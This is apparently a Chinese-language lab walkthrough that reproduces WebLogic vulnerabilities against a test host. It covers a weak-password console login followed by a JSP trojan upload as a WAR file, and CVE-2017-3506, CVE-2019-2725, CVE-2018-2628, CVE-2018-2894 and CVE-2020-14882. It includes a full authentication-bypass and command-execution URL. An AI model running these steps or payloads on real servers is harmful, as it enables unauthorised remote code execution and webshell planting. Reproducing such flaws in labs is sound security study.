WebLogic 漏洞复现

1、后台弱⼝令GetShell

默认账号密码：weblogic/Oracle@123

weblogic常⽤弱⼝令：https://cirt.net/passwords?criteria=weblogic

这⾥注意， 单个账号错误密码5次之后就会⾃动锁定。

http://47.121.212.195:7001/console

2、登录后台后，点击部署，点击安装，点击上传⽂件。

3、上传war包，jsp⽊⻢压缩成zip，修改后缀为war，上传

一直点击下一步

4、使用工具进行连接

2、CVE-2017-3506

1、验证是否存在wls-wsat组件

http://47.121.212.195:7001/wls-wsat/CoordinatorPortType

2、在当前⻚⾯抓包之后，添加下⾯请求包，反弹shell。

3、CVE-2019-2725

1、http://47.121.212.195:7001/_async/AsyncResponseService  

2、在当前⻚⾯抓包 , 修改请求包 , 写⼊shell

3、访问下载到weblogic服务器上的⽊⻢,进⾏连接

4、CVE-2018-2628

1、

2、直接使⽤利⽤工具

5、CVE-2018-2894

1、这⾥环境后台密码是随机得，获取密码: docker-compose logs | grep password

 2、设置Web服务测试开启

域结构 -> base-domain -> ⾼级 -> 启动Web服务测试页

3、点击保存 , 进⼊ config.do ⽂件进⾏设置，将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录

http://47.121.212.195:7001/ws_utc/config.do
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4、点击安全 , 点击添加

5、打开控制台, 找到对应时间戳

 

6、Webshell连接

6、CVE-2020-14882

1、访问管理控制台

2、使⽤以下url绕过登录认证

http://47.121.212.195:7001/console/css/%252e%252e%252fconsole.portal

3、⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令
http://47.121.212.195:7001/ console/css/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")